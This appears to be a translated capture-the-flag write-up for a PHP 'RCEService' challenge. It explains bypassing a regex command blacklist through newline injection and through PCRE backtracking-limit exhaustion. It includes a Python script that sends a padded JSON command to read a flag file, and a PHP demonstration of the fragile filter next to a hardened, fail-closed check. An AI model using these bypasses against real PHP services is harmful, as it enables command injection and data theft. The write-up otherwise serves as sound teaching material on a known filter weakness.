
How to Implement RCEService Regex Backtracking in PHP

2025-02-24 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31

Today, I would like to share with you the relevant knowledge points about how to achieve RCEService regex backtracking in PHP. The content is detailed and the logic is clear. I believe most people still know too much about this knowledge, so I am sharing this article for your reference. I hope you can get something out of reading it. Let's learn about it.

After opening the challenge and submitting a cmd in JSON format, I tried to read the source code of index.php, but I couldn't read it, and the directory scan turned up /index and /index/login, which had nothing in them. I really didn't know what to do. I could only look at other people's writeups, and found that they had audited the source code from the start. I was surprised. Where did the source code come from? I read a lot of writeups and found that the source code must have been given directly during the competition, but the BUU platform forgot to add it.

Seeing the final system call and the regular expression, it seems this challenge is about bypassing the regex to run a command through cmd. With so many functions on the blacklist, it is unlikely to have left us one that slipped through the net, is it?

We see that the regular expression has no modifiers, so we can take advantage of multi-line matching.

Here we can use the %0a newline character to bypass the regex match, since it takes the s modifier for the pattern to match the newline character. So let's try our earlier ls and see if it works.

It turned out that the PATH environment variable was set in the index.php source code (I thought it was just a hint about our directory), so let's take a look at that directory.

I found the flag file, but I could not read it with nl, cat, more, less or similar commands. After looking it up, I found that system commands depend on a specific environment variable, namely PATH: if the system cannot find the executable under that path, it cannot run the command.

So, after looking this up, I found that here you can only call a command by its absolute path, and the cat command is in the /bin/ directory.

The second way is that excessive regular expression backtracking makes the match return false. To be honest, this is the first time I have heard of regex backtracking problems.

Using PHP's PCRE backtracking limit to bypass certain security restrictions

To put it simply, when the regular expression is matched, a .* consumes all the remaining characters, so there is nothing left for the rest of the expression to match. The engine then gives back one character at a time until the rest of the expression matches or it has backtracked too many times.

Examples

After trying it myself, I found that it can only backtrack a million times.

'/^.*

At the start of the regular expression, ^ marks the beginning of the string, '.' stands for any character except the newline character, and * means the preceding expression is repeated any number of times. So it matches our entire payload right here, leaving no characters for the rest of the pattern, which can then only be satisfied by backtracking one character at a time.

Looking at the characters matched by the rest of the pattern, we can see that lowercase letters are not filtered, because the hexadecimal range \x00-\x1f, converted to decimal, does not reach the ASCII values of the lowercase letters. Therefore, we can repeat a lowercase letter a million times to make the regular expression fail outright.

```python
import requests

url = 'http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'
data = {
    # The "feng" value is a lowercase letter repeated a million times, as described above.
    'cmd': '{"cmd":"/bin/cat /home/rceservice/flag","feng":"' + 'a' * 1000000 + '"}'
}
r = requests.post(url=url, data=data).text
print(r)
```
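The two filter bypasses described above (input containing newlines, and padding that exhausts the backtracking limit), seen from the filter's side, as an added example that is not the challenge's source code. The patterns, function names and inputs are constructed, and pcre.jit is turned off on the assumption that the interpreter's backtracking limit is the one being shown.

```php
<?php
// Added example. Patterns and inputs are constructed, not the challenge's source.
ini_set('pcre.backtrack_limit', '1000000'); // PHP default, stated explicitly
ini_set('pcre.jit', '0');                   // assumption: interpreter path, where this limit applies

// Same shape as the filter discussed above: greedy ^.* in front, no s or m modifier.
const FRAGILE = '/^.*(system|passthru|cat|flag).*$/';
// No leading .* to backtrack through, and no reliance on "." crossing newlines.
const ROBUST = '/(system|passthru|cat|flag)/';

// Flawed: false (engine error) and 0 (no match) both read as "not blocked".
function blocked_loose(string $pattern, string $input): bool
{
    return (bool) preg_match($pattern, $input);
}

// Hardened: only a clean 0 lets the input through; engine errors fail closed.
function blocked_strict(string $pattern, string $input): bool
{
    $result = preg_match($pattern, $input);
    if ($result === false && preg_last_error() === PREG_BACKTRACK_LIMIT_ERROR) {
        error_log('regex filter hit pcre.backtrack_limit; rejecting input');
    }
    return $result !== 0;
}

// Constructed inputs: one ordinary, one with newlines, one padded with a million letters.
$inputs = [
    'plain'   => '{"cmd":"cat flag"}',
    'newline' => "{\n\"cmd\":\"cat flag\"\n}",
    'padded'  => '{"cmd":"cat flag","pad":"' . str_repeat('a', 1000000) . '"}',
];

foreach ($inputs as $name => $input) {
    printf(
        "%-8s fragile+loose=%-3s fragile+strict=%-3s robust+strict=%s\n",
        $name,
        blocked_loose(FRAGILE, $input) ? 'yes' : 'no',
        blocked_strict(FRAGILE, $input) ? 'yes' : 'no',
        blocked_strict(ROBUST, $input) ? 'yes' : 'no'
    );
}
```

Each column reports whether that combination of pattern and return-value check rejects the input.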
